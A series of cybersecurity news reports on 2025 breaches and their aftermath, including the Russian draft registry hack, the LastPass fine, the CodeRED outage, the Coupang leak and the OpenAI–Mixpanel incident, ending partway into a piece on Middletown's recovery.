A cyberattack on Russia has reportedly targeted Russia’s digital military draft system. According to Grigory Sverdlin, head of the draft-dodging nonprofit Idite Lesom, anonymous hackers successfully breached a key developer of the system on Thursday. “For the next few months, the system, which holds 30 million records, will not be able to send people off to kill or die,” Sverdlin wrote on Facebook.   He added that his organization had received a large set of documents from the hackers, including source code, technical documentation, and internal communications from Russia’s software provider Micord, a central developer of the digital military draft system. 

Cyberattack on Russia’s Digital Military Draft System 

Micord’s website was reportedly inaccessible on Thursday, displaying a notice that it was under “technical maintenance.” Meanwhile, the investigative outlet IStories, which obtained the documents from Idite Lesom, confirmed the breach with Micord’s director, Ramil Gabdrahmanov.  “Listen, it could happen to anyone. Many are being attacked right now,” Gabdrahmanov said. He declined to confirm whether Micord had worked on Russia’s unified military registration database, stating, “We work on many different projects.” Nonetheless, IStories independently verified Micord’s involvement in the digital registry.  Despite the cyberattack on Russia’s digital military draft system, some users reported that the database website was still accessible, though it remained unclear whether electronic draft summonses had been disrupted. The Russian Defense Ministry dismissed the claims of a breach as “fake news,” asserting that the registry continued to operate normally.   “The registry has been repeatedly subjected to hacking attacks. They have all been successfully repelled,” the ministry said, emphasizing that attempts to disrupt the system had so far “failed to achieve their objectives", reported IStories.

Digital Military Draft System: Modernizing Russia’s Draft Process 

The digital military draft system, part of a broader modernization of Russia’s wartime enlistment process, centralizes records of men aged 18 to 30 and allows authorities to issue summonses online, eliminating the need for in-person notifications.  The system has faced multiple delays, with its initial launch scheduled for November 2024. Russia’s fall 2025 draft, which runs from October 1 to December 31, was expected to rely on this digital registry in four regions, including Moscow.  Sverdlin noted that once fully operational, the online system automatically enforces restrictions on draftees who fail to report for compulsory service, including travel bans.  

Origins and Government Plans for the Unified Registry 

The hacker group reportedly remained in Micord’s system for several months, accessing critical infrastructure, operational correspondence, and the source code, which they claimed to have destroyed. The documents were shared with journalists at IStories, who confirmed their authenticity.  The Russian government first announced plans for a unified digital military registration registry in April 2023, when the State Duma passed a bill creating the system. RT Labs, a Rostelecom subsidiary, was initially named as one of the developers.   In February 2024, Rostelecom was designated as the sole contractor to complete the system for the Ministry of Digital Development, Communications, and Mass Media, with a completion deadline of December 31, 2024. Though initially intended for the 2024 fall draft, the registry became fully operational only in October 2025, with several regions adopting electronic summonses and phasing out paper notifications. 

The Information Commissioner’s Office (ICO) has fined password manager provider LastPass UK Ltd £1.2 million following a 2022 data breach that compromised the personal information of up to 1.6 million people in the UK. The data breach occurred in August 2022 and was the result of two isolated incidents that, when combined, enabled a hacker to gain unauthorized access to LastPass’ backup database. The stolen information included customer names, email addresses, phone numbers, and stored website URLs. While the data breach exposed sensitive personal information, the ICO confirmed there is no evidence that hackers were able to decrypt customer passwords. This is due to LastPass’ use of a ‘zero knowledge’ encryption system, which ensures that master passwords and vaults are stored locally on customer devices and never shared with the company.

Incident One: Corporate Laptop Compromised

The first incident involved a LastPass employee’s corporate laptop based in Europe. A hacker gained access to the company’s development environment and obtained encrypted company credentials. Although no personal information was taken at this stage, the credentials could have provided access to the backup database if decrypted. LastPass attempted to mitigate the hacker’s activity and believed the encryption keys remained safe, as they were stored outside the compromised environment in the vaults of four senior employees.

Incident Two: Personal Device Targeted

The second incident proved more damaging. The hacker targeted one of the senior employees who had access to the decryption keys. Exploiting a known vulnerability in a third‑party streaming service, the attacker gained access to the employee’s personal device. A keylogger was installed, capturing the employee’s master password. Multi‑factor authentication was bypassed using a trusted device cookie. This allowed the hacker to access both the employee’s personal and business LastPass vaults, which were linked by a single master password. From there, the hacker obtained the Amazon Web Service (AWS) access key and decryption key stored in the business vault. Combined with information taken the previous day, this enabled the extraction of the backup database containing customer personal information.

ICO’s Findings and Fine on LastPass UK

The ICO investigation concluded that LastPass failed to implement sufficiently strong technical and security measures, leaving customers exposed. Although the company’s zero knowledge encryption protected passwords, the exposure of personal data was deemed a serious failure. John Edwards, UK Information Commissioner, stated: “Password managers are a safe and effective tool for businesses and the public to manage their numerous login details, and we continue to encourage their use. However, as is clear from this incident, businesses offering these services should ensure that system access and use is restricted to reduce risks of attack. LastPass customers had a right to expect their personal information would be kept safe and secure. The company fell short of this expectation, resulting in the proportionate fine announced today.”

Lessons for Businesses

The ICO has urged all UK businesses to review their systems and procedures to prevent similar risks. This case underscores the importance of restricting system access, strengthening cybersecurity measures, and ensuring that employees’ personal devices do not become weak points in corporate networks. While password managers remain a recommended tool for managing login details, the incident shows that even trusted providers can fall short if internal safeguards are not sufficiently strong. The £1.2 million fine against LastPass UK Ltd serves as a clear reminder that companies handling sensitive data must uphold the highest standards of security. Although customer passwords were protected by the company’s zero knowledge encryption system, the exposure of personal information has left millions vulnerable. The ICO’s ruling reinforces the need for constant vigilance in the face of growing cyber threats. For both businesses and individuals, the message is straightforward: adopt strong security practices, conduct regular system reviews, and implement robust employee safeguards to reduce the risk of future data breaches.

The City of Cambridge has released an important update regarding the OnSolve CodeRED emergency notifications system, also known locally as Cambridge’s reverse 911 system. The platform, widely used by thousands of local governments and public safety agencies across the country, was taken offline in November following a nationwide OnSolve CodeRED cyberattack. Residents who rely on CodeRED alerts for information about snow emergencies, evacuations, water outages, or other service disruptions are being asked to take immediate steps to secure their accounts and continue receiving notifications.

Impact of the OnSolve CodeRED Cyberattack on User Data

According to city officials, the data breach affected CodeRED databases nationwide, including Cambridge. The compromised information may include phone numbers, email addresses, and passwords of registered users. Importantly, the attack targeted the OnSolve CodeRED system itself, not the City of Cambridge or its departments. This OnSolve CodeRED cyberattack incident mirrors similar concerns raised in Monroe County, Georgia, where officials confirmed that residents’ personal information was also exposed. The Monroe County Emergency Management Agency emphasized that the breach was part of a nationwide cybersecurity incident and not a local failure.

Transition to CodeRED by Crisis24

In response, OnSolve permanently decommissioned the old CodeRED platform and migrated services to a new, secure environment known as CodeRED by Crisis24. The new system has undergone comprehensive security audits, including penetration testing and system hardening, to ensure stronger protection against future threats. For Cambridge residents, previously registered contact information has been imported into the new platform. However, due to security concerns, all passwords have been removed. Users must now reset their credentials before accessing their accounts.

Steps for City of Cambridge Residents and Users

To continue receiving emergency notifications, residents should:

• Visit accountportal.onsolve.net/cambridgema
• Enter their username (usually an email address)
• Select “forgot password” to verify and reset credentials
• If unsure of their username, use the “forgot username” option

Officials strongly advise against reusing old CodeRED passwords, as they may have been compromised. Instead, users should create strong, unique passwords and update their information once logged in. Additionally, anyone who used the same password across multiple accounts is urged to change those credentials immediately to reduce the risk of further exposure.

Broader National Context

The Monroe County cyberattack highlights the scale of the issue. Officials there reported that data such as names, addresses, phone numbers, and passwords were compromised. Residents who enrolled before March 31, 2025, had their information migrated to the new Crisis24 CodeRED platform, while those who signed up afterward must re‑enroll. OnSolve has reassured communities that the intrusion was contained within the original system and did not spread to other networks. While there is currently no evidence of identity theft, the incident underscores the growing risks of cyber intrusions nationwide.

Resources for Cybersecurity Protection

Residents who believe they may have been victims of cyber‑enabled fraud are encouraged to report incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov. Additional resources are available to help protect individuals and families from fraud and cybercrime. Security experts note that the rising frequency of attacks highlights the importance of independent threat‑intelligence providers. Companies such as Cyble track vulnerabilities and cybercriminal activity across global networks, offering organizations tools to strengthen defenses and respond more quickly to incidents.

Looking Ahead

The City of Cambridge has thanked residents for their patience as staff worked with OnSolve to restore emergency alert capabilities. Officials emphasized that any breach of security is a serious concern and confirmed that they will continue monitoring the new CodeRED by Crisis24 platform to ensure its standards are upheld. In addition, the City is evaluating other emergency alerting systems to determine the most effective long‑term solution for community safety.

Four years after the HSE cyberattack that crippled Ireland’s national health service, the Health Service Executive has begun offering financial compensation to individuals whose personal data was compromised in the incident. The payment proposal is the first time the HSE has formally acknowledged the need to compensate those affected by what remains one of the largest recorded cyberattacks on health systems worldwide.  The cyberattack on HSE occurred on May 14, 2021, when the Conti ransomware group, a Russia-based cybercrime organization, launched a large-scale intrusion that forced the shutdown of the health service’s IT network. The ransomware incident led to widespread treatment delays and exposed sensitive information belonging to almost 100,000 staff members and patients. Investigators later determined that the breach began when a malicious file attached to a phishing email was opened on the dispersed and “frail” IT infrastructure used by the health service. 

Hundreds of Legal Proceedings Underway Following the HSE Cyberattack 

As legal disputes have grown over the last four years, the HSE has now extended an offer of €750 in damages to each affected claimant. A further €650 per person has been allocated to cover legal fees. According to Cork-based O’Dowd Solicitors, representing more than 100 individuals, the offer was received on Friday and was described to clients as a “significant development.” The firm told its clients that this was “the first time in public (or private that I know of, the HSE has acknowledged that they will need to compensate individuals impacted by the breach.”  According to RTÉ News, the proposed €750 payment would be issued within 28 days of an accepted offer and would serve as a “full and final settlement” of any ongoing proceedings. O’Dowd Solicitors declined to comment publicly on the matter, though it is understood the firm is currently advising clients on their options.  The offer follows a recent high-profile legal ruling in Ireland that affirmed an individual’s right to damages in relation to data breaches, a decision seen by legal observers as having implications for the mounting number of cases linked to the HSE cyberattack.  As of November 2025, the HSE confirmed that approximately 620 legal proceedings had been issued in connection with the attack. A spokeswoman said that the HSE “is working closely with the State Claims Agency in relation to this matter and is engaging with legal representatives accordingly,” adding that “these legal matters between the HSE and affected individuals are confidential.”  In earlier updates, the health service said it had reached out to all individuals whose information had been compromised, with 90,936 people ultimately contacted following the breach. The scale of the incident placed immense pressure on clinical operations, causing long delays in diagnostics, appointments, and elective procedures over an extended period. 

Cybersecurity Overhaul Following the Conti Attack 

Since the 2021 intrusion, the HSE has noted that it has “invested significantly” in strengthening its cybersecurity posture. According to the organization, multiple work programs are underway to address vulnerabilities identified in the aftermath of the cyberattack on HSE. The HSE reports that it now responds to thousands of cyber threats annually and continues to expand “multi-layered cyber defenses” intended to detect and mitigate ongoing risks. The agency acknowledges that the attack exposed critical weaknesses in its digital infrastructure and reiterated that enhancing cyber capability remains a core operational priority.  The compensation development was first reported by the Irish Independent and signals a new phase in the long-running fallout from the HSE cyberattack carried out by the Conti ransomware group. For many victims, the proposed payments represent a long-awaited acknowledgment of the breach’s impact, though the final resolution of the hundreds of legal claims still depends on individual acceptance of the settlement terms. 

Barts Health NHS Trust has confirmed that the data breach at Barts Health was carried out by the Russian-speaking Cl0p ransomware group, which exploited a vulnerability in Oracle E-Business Suite. The Barts Health data breach involved the theft of files from one of the trust’s invoice databases, exposing information linked to payments for treatment and other services, some dating back several years.  In its official notification, the trust stated, “As a result of a recent incident involving data from our trust, we are informing those potentially affected that there is a risk some personal data is compromised.”  The trust confirmed that the criminal group stole files containing names and addresses of individuals required to pay for treatment or services at a Barts Health hospital. These files were later posted on the dark web. Barts Health emphasized that it is pursuing legal remedies, noting, “We are taking urgent action and seeking a High Court order to ban the publication, use or sharing of this data by anyone.” 

Details of the Barts Health Data Breach and Exposed Information 

The cyberattack on Barts Health occurred after Cl0p exploited a flaw in Oracle E-Business Suite, a widely used system for automating business processes. Oracle has since corrected the vulnerability, which has affected multiple organizations globally.  The trust has reported the Barts Health data breach to NHS England, the National Cyber Security Centre, the Metropolitan Police, and the Information Commissioner’s Office. Despite the intrusion, Barts Health stressed that core healthcare systems remain secure: “Please note our electronic patient record and clinical systems are not affected, and we are confident our core IT infrastructure is secure.”  Paying patients are encouraged to review their treatment invoices to understand which details may have been exposed. Some former employees also appear in the files due to outstanding salary sacrifice amounts or overpayments. Nearly half of the compromised records relate to suppliers whose information is already publicly accessible.  The affected database also contains accounting files that Barts Health has managed since April 2024 for Barking, Havering, and Redbridge University Hospitals NHS Trust. Both trusts are coordinating efforts to limit the impact. 

Timeline of the Breach and Potential Risks to Individuals 

Although the theft occurred in August, Barts Health did not receive any indication that data had been compromised until November, when the files were uploaded to the dark web. None of the information has emerged on the open internet, restricting exposure to individuals with access to encrypted and compressed files on the dark web.  The trust warned that the stolen files cannot grant direct access to personal accounts but may help criminals craft scams to trick victims into sharing sensitive information or making payments. Individuals with concerns are advised to contact the trust’s data protection officer or consult national guidance such as “Stop! Think Fraud – How to stay safe from scams.”  Barts Health apologized for the incident, stating, “We are very sorry that this has happened and are taking steps with our suppliers to ensure that it could not happen again.”  The Cl0p ransomware group is a well-known cybercriminal syndicate recognized for its multilayer extortion operations, including encryption-less ransomware tactics. Responsible for extorting more than $500 million in ransom payments worldwide, Cl0p became prominent in 2019 through extensive phishing campaigns and malware. The group frequently exploits zero-day vulnerabilities, enabling high-impact attacks and ransom demands. 

A former student has been charged over an extended series of security breaches linked to the Western Sydney University cyberattack that has affected the institution since 2021. According to police, the university endured repeated unauthorized access, data exfiltration, system compromises, and the misuse of its infrastructure, activities that also involved threats to release student information on the dark web. Authorities estimate that hundreds of staff and students have been impacted over the course of the breaches.  Detectives worked with Western Sydney University, the AFP’s Joint Policing Cyber Coordination Centre (JCP3), and external cybersecurity specialists to trace the intrusions. Their investigation led to a 27-year-old woman, a former student of the university, who was first arrested and charged in June.

The Complex Case of the Western Sydney University Cyberattack 

Despite the earlier arrest, police allege the student continued offending, sending more than 100,000 fraudulent emails to students to damage the university’s reputation and cause distress. As part of the continuing inquiry into the cyberattack on Western Sydney University, detectives executed a search warrant in North Kellyville, where the student was again arrested. Officers stated that she possessed a mobile phone modified to function as a computer terminal, allegedly used in cyber offences.  She was taken to The Hills Police Station and charged with multiple offences, including two counts of unauthorized function with intent to commit a serious offence, two counts of fabricating false evidence with intent to mislead a judicial tribunal, and breach of bail. Police say she also posted fabricated material online that was designed to exonerate herself during the ongoing legal proceedings. Bail was refused, and she was due to appear in court the following day. 

University Issues Public Notification After Continued Cyber Incidents 

Western Sydney University released a public notification on 23 October 2025, advising the community of personal information that may have been compromised in the broader Western Sydney University cyberattack pattern. The notice included a statement expressing regret over the situation:  “I want to again apologize for the impact this is having and give you my assurance that we are doing everything we can to rectify this issue and support our community.”  The university confirmed that it had been working closely with the NSW Police Force Cybercrime Squad’s Strike Force Docker, which had arrested and charged the former student on 25 June 2025. However, attempts to breach university systems continued even after the arrest, including attempts that exploited external IT service providers.  Unusual activity was detected twice, on 6 August and 11 August 2025, within the Student Management System, which is hosted by a third-party provider on a cloud platform. An immediate investigation led the university to shut down access to the platform. It was later confirmed that unauthorized access occurred through external systems linked to the platform between 19 June and 3 September 2025. These linked systems allow intruders to extract personal data from the Student Management System.  University investigators also determined that fraudulent emails sent on 6 October 2025 had used data stolen during this period. Authorities asked the university to delay notifying the community to avoid disrupting the police investigation. With approval finally granted, the university issued a comprehensive notice to students, former students, staff, offer recipients, The College, The International College, and Early Learning Ltd personnel. 

Scope of Compromised Information 

According to the public notification, the cyber incidents may have exposed a wide range of personal information, including contact details, names, dates of birth, identification numbers, nationality information, employment and payroll records, bank and tax details, driver's license and passport information, visa documentation, complaint files, and certain health, disability, and legal information.  Individual notifications are being issued to those affected, including updated findings from earlier incidents.  The notification advised individuals to change passwords, preferably to those of at least 15 characters, and implement multi-factor authentication across online accounts. Additional support services include a dedicated cyber incident website, a university phone line for inquiries, resources from the NSW Information and Privacy Commission, and reporting options via the Australian Cyber Security Centre for anyone who believes their information has been misused. 

FTC action takes center stage as the U.S. Federal Trade Commission has announced strong enforcement steps against education technology (Edtech) provider Illuminate Education, following a major data breach that exposed the personal information of more than 10 million students across the United States. The agency said the company failed to implement reasonable security measures despite promising schools and parents that student information was protected.

Why the Agency Intervened

FTC complaint outlines a series of allegations against the Wisconsin-based company, which provides cloud-based software tools for schools. According to the complaint, Illuminate Education claimed it used industry-standard practices to safeguard student information but failed to put in place basic security controls. The Illuminate Education data breach incident dates back to December 2021 when a hacker accessed the company’s cloud databases using login credentials belonging to a former employee who had left the company more than three years earlier. This lapse allowed unauthorized access to data belonging to 10.1 million students, including email addresses, home addresses, dates of birth, academic records, and sensitive health information. FTC officials said the company ignored warnings as early as January 2020, when a third-party vendor alerted them to several vulnerabilities in their systems. The data security failures included weak access controls, gaps in threat detection, and a lack of proper vulnerability monitoring and patch management. The agency also noted that student data was stored in plain text until at least January 2022, increasing the severity of the breach.

FTC Action: Requirements Under the Proposed Order

As part of the proposed settlement, the FTC will require Illuminate Education to adopt a comprehensive information security program and follow stricter privacy obligations. The proposed FTC order includes several mandatory steps:

• Deleting any personal information that is no longer required for service delivery.
• Following a transparent, publicly available data retention schedule that explains why data is collected and when it will be deleted.
• Implementing a detailed information security program to protect the confidentiality and integrity of personal information.
• Notifying the FTC when the company reports a data breach to any federal, state, or local authority.

The order also prohibits the company from misrepresenting its data security practices or delaying breach notifications to school districts and families. The FTC said Illuminate had waited nearly two years before informing some districts about the breach, impacting more than 380,000 students. The Commission has voted unanimously to advance the complaint and proposed order for public comment. It will be published in the Federal Register, where stakeholders can share feedback for 30 days before the FTC decides whether to finalize the consent order.

FTC Action and State-Level Enforcement

Alongside the federal enforcement, the state data breach settlement adds another layer of accountability. Attorneys General from California, Connecticut, and New York recently announced a $5.1 million settlement with Illuminate Education for failing to adequately protect student data during the same 2021 cyber incident. California will receive $3.25 million in civil penalties, and the settlement includes strict requirements designed to improve the company’s cybersecurity safeguards. With more than 434,000 California students affected, this marks one of the largest enforcement actions under the California K-12 Pupil Online Personal Information Protection Act (KOPIPA). State officials emphasized that educational technology companies must prioritize the security of children’s data, which often includes highly sensitive information like medical details and learning records.

South Korean e-commerce giant Coupang has confirmed a massive data breach that exposed personal information belonging to nearly 33.7 million customers, making it one of the country’s largest cybersecurity incidents in recent years. The company publicly apologised over the weekend, acknowledging that the Coupang data breach stemmed from unauthorised access that may have continued undetected for months. Park Dae-jun, CEO of Coupang, issued a statement on the company’s website saying, “We sincerely apologise once again for causing our customers inconvenience.” The firm, often referred to as the “Amazon of South Korea,” said it is cooperating with law enforcement and regulatory authorities as investigations continue.

Coupang Data Breach Went Undetected for Months

According to Coupang, the unauthorised access began on June 24 through overseas servers but was only discovered on November 18. The company initially believed only about 4,500 accounts were affected. However, further analysis revealed that 33.7 million users had some form of delivery-related personal information exposed. The leaked data includes customer names, phone numbers, email addresses, shipping addresses, and certain order histories. Coupang stressed that no payment card information, financial data, or login credentials were compromised. The company has 24.7 million active commercial users as of the third quarter, which means the Coupang data breach covers almost its entire user base.

Former Employee Identified as Main Suspect

South Korean police confirmed that they have secured the IP address used in the attack and have identified the suspect behind the breach. Investigators say the individual is a former Coupang employee, a Chinese national who has already left South Korea. “We are analysing server logs submitted by Coupang. We have secured the IP used by the suspect and are tracking them down,” an official at the Seoul Metropolitan Police said. Authorities are also verifying whether the individual is linked to an email sent to Coupang threatening to reveal the stolen information.

Government Steps In as Public Concern Rises

The Ministry of Science and ICT held an emergency meeting on Sunday to review the scale of the incident and assess whether Coupang violated any personal information protection rules. Minister Bae Kyung-hoon said regulators are closely monitoring the company’s handling of the breach. The Korea Internet & Security Agency (KISA) issued a public advisory warning users to remain alert for phishing attempts or scam messages pretending to be from Coupang. So far, police have not received reports of smishing or voice phishing linked to the breach, but authorities say preparations are in place in case the situation escalates. The Coupang data breach adds to growing frustration among South Korean consumers, who have witnessed a series of major data leaks this year. SK Telecom and other large companies have faced similar cybersecurity incidents, increasing pressure on businesses to strengthen internal security controls.

Coupang Issues Customer Guidance

The company has started notifying impacted customers through email and text messages. In an FAQ shared with users, Coupang clarified what information was exposed and what steps customers should take. The company reiterated that payment, card details, and passwords were not affected. Coupang also explained that it notified authorities immediately after confirming the issue and is committed to updating customers as the investigation progresses. For now, the company says users do not need to take additional action beyond remaining cautious of unsolicited calls, links or messages claiming to be from Coupang. Police are verifying the suspect’s identity, travel history, and potential motives. They are also examining whether the individual acted alone or was linked to a wider scheme. The case has now moved from an internal inquiry to a full-scale criminal investigation. As authorities continue to analyse server logs and cross-border activity, concerns remain that the scale or impact of the Coupang data breach could grow. For now, officials say there is no evidence of financial misuse, but investigations are still in early stages.

OpenAI has confirmed a security incident involving Mixpanel, a third-party analytics provider used for its API product frontend. The company clarified that the OpenAI Mixpanel security incident stemmed solely from a breach within Mixpanel’s systems and did not involve OpenAI’s infrastructure. According to the initial investigation, an attacker gained unauthorized access to a portion of Mixpanel’s environment and exported a dataset that included limited identifiable information of some OpenAI API users. OpenAI stated that users of ChatGPT and other consumer-facing products were not impacted.

OpenAI Mixpanel Security Incident: What Happened

The OpenAI Mixpanel security incident originated on November 9, 2025, when Mixpanel detected an intrusion into a section of its systems. The attacker successfully exported a dataset containing identifiable customer information and analytics data. Mixpanel notified OpenAI on the same day and shared the affected dataset for review on November 25. OpenAI emphasized that despite the breach, no OpenAI systems were compromised, and sensitive information such as chat content, API requests, prompts, outputs, API keys, passwords, payment details, government IDs, or authentication tokens were not exposed. The exposed dataset was strictly limited to analytics data collected through Mixpanel’s tracking setup on platform.openai.com, the frontend interface for OpenAI’s API product.

Information Potentially Exposed in the Mixpanel Data Breach

OpenAI confirmed that the type of information potentially included in the dataset comprised:

• Names provided on API accounts
• Email addresses associated with API accounts
• Coarse location data (city, state, country) based on browser metadata
• Operating system and browser information
• Referring websites
• Organization or User IDs linked to API accounts

OpenAI noted that the affected information does not include chat content, prompts, responses, or API usage data. Additionally, ChatGPT accounts, passwords, API keys, financial details, and government IDs were not involved in the incident.

OpenAI’s Response and Security Measures

In response to the Mixpanel security incident, OpenAI immediately removed Mixpanel from all production services and began reviewing the affected datasets. The company is actively notifying impacted organizations, admins, and users through direct communication. OpenAI stated that it has not found any indication of impact beyond Mixpanel’s systems but continues to closely monitor for signs of misuse. To reinforce user trust and strengthen data protection, OpenAI has:

• Terminated its use of Mixpanel
• Begun conducting enhanced security reviews across all third-party vendors
• Increased security requirements for partners and service providers
• Initiated a broader review of its vendor ecosystem

OpenAI reiterated that trust, security, and privacy remain central to its mission and that transparency is a priority when addressing incidents involving user data.

Phishing and Social Engineering Risks for Impacted Users

While the exposed information does not include highly sensitive data, OpenAI warned that the affected details, such as names, email addresses, and user IDs, could be leveraged in phishing or social engineering attacks. The company urged users to remain cautious and watch for suspicious messages, especially those containing links or attachments. Users are encouraged to:

• Verify messages claiming to be from OpenAI
• Be wary of unsolicited communication
• Enable multi-factor authentication (MFA) on their accounts
• Avoid sharing passwords, API keys, or verification codes

OpenAI stressed that the company never requests sensitive credentials through email, text, or chat. OpenAI confirmed it will provide further updates if new information emerges from ongoing investigations. Impacted users can reach out at mixpanelincident@openai.com for support or clarification.

Crisis24’s OnSolve CodeRED emergency alert system has been disrupted by a cyberattack, leaving local governments throughout the U.S. searching for alternatives or waiting for a new system to come online. The INC ransomware group has claimed responsibility for the attack. Some personal data of users may have been exposed in the attack, including names, addresses, email addresses, phone numbers, and passwords, and users have been urged to change passwords for other accounts if the same password is used. Crisis24 is launching a new secure CodeRED System that was already in development, and local governments had varying reactions to the crisis.

New CodeRED Emergency Alert System Expected Soon

Several U.S. local governments issued statements after the attack, updating residents on the CodeRED system’s status and their plans. The City of University Park, Texas, said Crisis24 is launching a new CodeRED System, which was already in the works. “Our provider assures us that the new CodeRED platform resides on a non-compromised, separate environment and that they completed a comprehensive security audit and engaged external experts for additional penetration testing and hardening,” the city said in its statement. “The provider decommissioned the OnSolve CodeRED platform and is the process of moving all customers to its new CodeRED platform.” Craven County Emergency Services in North Carolina said the new CodeRED platform “will be available before November 28.” In the meantime, Craven County said announcements and alerts will continue to be released through local media, the Craven County website, or on Craven County’s social media accounts. The Douglas County Sheriff's Office in Colorado said on Nov. 24 that it took “immediate action to terminate our contract with CodeRED for cause. Our top priority is the privacy and protection of our citizens, which led to the decision to end our agreement with CodeRED.” The Sheriff’s Office said it “is actively searching for a replacement for the CodeRED platform.” The office said it still has the ability to issue “IPAWS” alerts to citizens when necessary, and “will continue to implement various contingency plans, including outreach through social media and door-to-door notifications, to ensure our community stays informed during emergency situations.”

INC Ransom Claims Responsibility for CodeRED Attack

The INC Ransom group claimed responsibility for the CodeRED emergency alert system attack on its dark web data leak site. The threat actors say they obtained initial access on Nov. 1, followed by network encryption on Nov. 10. The group claims to have exfiltrated approximately 1.15 TB before deploying encryption. To substantiate their claims, INC Ransom has published several data samples, including csv files with client-related data, threat intelligence company Cyble reported in a note to clients. Additionally, the group released two screenshots allegedly showing negotiation attempts, where the company purportedly offered as much as USD $150,000, an amount the attackers claim they refused.

SitusAMC, a major provider of back-end services for leading banks and lenders, has confirmed a SitusAMC data breach that resulted in the compromise of certain client and customer information. The SitusAMC data breach incident, discovered earlier this month, has raised concerns due to the company’s extensive role in mortgage origination, servicing, and compliance within the real-estate financing ecosystem. Responding to The Cyber Express team query, Michael Franco, Chief Executive Officer (CEO) of SitusAMC, said, “We recently became aware of a data security incident impacting certain of our systems. We promptly retained leading third-party experts, launched an investigation, and notified law enforcement. The incident has been contained and SitusAMC is fully operational. No encrypting malware was deployed on our systems. We are in direct contact with our clients about this matter. We remain focused on analyzing any potentially affected data and will provide updates directly to our clients as our investigation progresses.” According to the company’s disclosure, SitusAMC became aware of the incident on November 12, 2025, and later determined that specific information stored on its systems had been accessed without authorization. While the full scope of the SitusAMC data breach remains under investigation, the company stated that the impacted information includes corporate data associated with clients, such as accounting records and legal agreements, along with certain data belonging to clients’ customers. SitusAMC emphasized that the incident did not involve encrypting malware and that its operational services continue to run without disruption. External cybersecurity experts and federal law enforcement authorities are assisting in the ongoing investigation.

SitusAMC Data Breach Details

In its public notice, the company disclosed that upon detecting the incident, immediate steps were taken to investigate, contain, and secure its systems. The firm began working closely with third-party specialists and notified federal law enforcement to ensure a coordinated response. SitusAMC reiterated that although some information was compromised, all services remain fully operational. No ransomware activity or system encryption was detected, indicating that the attack did not follow the pattern of typical extortion-driven breaches. The company is continuing to analyze the impacted data and remains in close contact with affected clients. In response to the breach, SitusAMC implemented several additional security measures aimed at strengthening its environment against further threats. These steps include resetting credentials, disabling certain remote access tools, updating firewall rules, and enhancing internal security configurations. The company noted that it is still determining which specific services and products may have been affected. However, early assessments indicate that core business operations remain intact.

Impact on Client and Customer Data

The company confirmed that certain client business information was accessed during the incident. This includes internal corporate data and documentation related to client relationships. SitusAMC also stated that some customer information tied to clients may have been impacted, though the nature and extent of this exposure is still being assessed. SitusAMC assured stakeholders that it is working “around the clock” alongside its advisors to determine the full level of impact and will provide updates as the investigation progresses.

Customer Notification and Transparency

To maintain transparency, the company publicly released an example of the customer notification letter distributed on November 22, 2025. The letter outlines what occurred, the types of information potentially exposed, and the steps being taken to safeguard systems moving forward. [caption id="attachment_107113" align="aligncenter" width="1024"] Source: SitusAMC[/caption] In the letter, the company reiterated that the incident is contained, services remain fully operational, and no encrypting malware was used. Clients were encouraged to reach out to the company’s security team for additional queries.

Salesforce has issued a new update on the ongoing Salesforce Gainsight security incident, confirming additional details about the unusual activity detected across Gainsight-published applications connected to the CRM platform. The company reiterated that the incident stemmed from the app’s external integration with Salesforce rather than any vulnerability in the Salesforce core platform.

Salesforce Confirms Expanded Investigation

In its latest advisory, Salesforce stated that the unusual activity affecting Gainsight applications may have enabled unauthorized access to certain customers' Salesforce data through the app-to-Salesforce connection. As part of its precautionary measures, Salesforce revoked all active access and refresh OAuth tokens associated with Gainsight-published applications and removed the apps from its AppExchange. While initial communication referenced only three affected customers, Salesforce confirmed on November 21 that the list has expanded, and all newly identified impacted customers have been notified directly. Salesforce emphasized that a broader investigation is underway and continues to provide updates on its official Help portal. [caption id="attachment_107067" align="aligncenter" width="895"] Source: Salesforce[/caption]

Gainsight Products and Connectors Temporarily Impacted

According to Gainsight’s latest communication, several of its products, including Gainsight CS, Community (CC), Northpass (CE), Skilljar (SJ), and Staircase (ST), have been affected by Salesforce’s precautionary disconnection. Although the products remain operational, they are currently unable to read or write data to Salesforce. In addition, several third-party connectors integrated with Gainsight, such as Gong.io, Zendesk, and HubSpot, have been temporarily disabled by their respective vendors out of an abundance of caution. Gainsight urged customers to rotate their S3 keys if they have not done so since November 20, 2025, as part of the secure log retrieval process.

No Indication of Salesforce Platform Vulnerability

Salesforce reiterated that there is no evidence suggesting the issue originated from a flaw within the Salesforce platform itself. Instead, the activity appears tied to the external OAuth-based connection between Gainsight applications and Salesforce environments. Crucially, Salesforce confirmed that while the OAuth tokens have been revoked, historical audit trails and logs remain intact, enabling full customer-led investigation efforts. The company also strongly encouraged customers to conduct thorough log reviews using Setup Audit Trail, Event Monitoring logs, and API activity records. Salesforce referenced the Salesforce Log Analysis Guide to support customers in assessing potential compromise indicators.

Indicators of Compromise Published

As part of its transparency efforts, Salesforce shared a list of Indicators of Compromise (IOCs) associated with the threat activity. These include several user agents—such as python-requests/2.32.3 and Salesforce-Multi-Org-Fetcher/1.0—and dozens of IP addresses linked to suspicious access attempts. Gainsight echoed Salesforce’s recommendations and is conducting its own forensic review with support from independent investigators. Both organizations confirmed that the Salesforce Gainsight security incident remains under active investigation. Gainsight has published a detailed timeline and continues to coordinate with Salesforce to determine the full impact. Customers seeking assistance have been directed to Salesforce Help and Gainsight Support for further updates.

The City of Middletown has released a new update as part of its ongoing cybersecurity restoration following the significant City of Middletown cyberattack that disrupted multiple municipal services earlier this year. The latest announcement, dated November 20, 2025, provides details on the resumption of utility billing, the status of delinquent accounts, and broader system recovery efforts. As part of the continuing cybersecurity restoration process, Middletown officials confirmed that utility billing will restart in December. Because billing systems were offline for several months, the first bills will be based on estimated usage from the same period last year, plus an additional 25% to account for service charges accrued during the outage. Flat-fee services, including refuse, stormwater, and toter charges—will also be back-billed in full and are expected to return to standard billing cycles in January 2026. While the city aims to restore traditional meter readings, officials noted that a firm timeline is not yet available. Until systems are fully repaired, estimated billing will continue into early 2026. Once meter readings resume, actual usage during the outage will be calculated and spread across six billing cycles to minimize financial burden on residents.

Delinquent Accounts and Service Continuity

During the City of Middletown cyberattack, the city temporarily paused all utility shutoffs, including for accounts already delinquent before the incident. Shutoffs will now resume only for those pre-existing delinquent accounts. Residents with outstanding balances will receive individual notices outlining payment options and steps to prevent service interruption. For support or questions, residents may contact the Utility Billing Office at (513) 425-7870.

City of Middletown Cyberattack: Ongoing System Recovery 

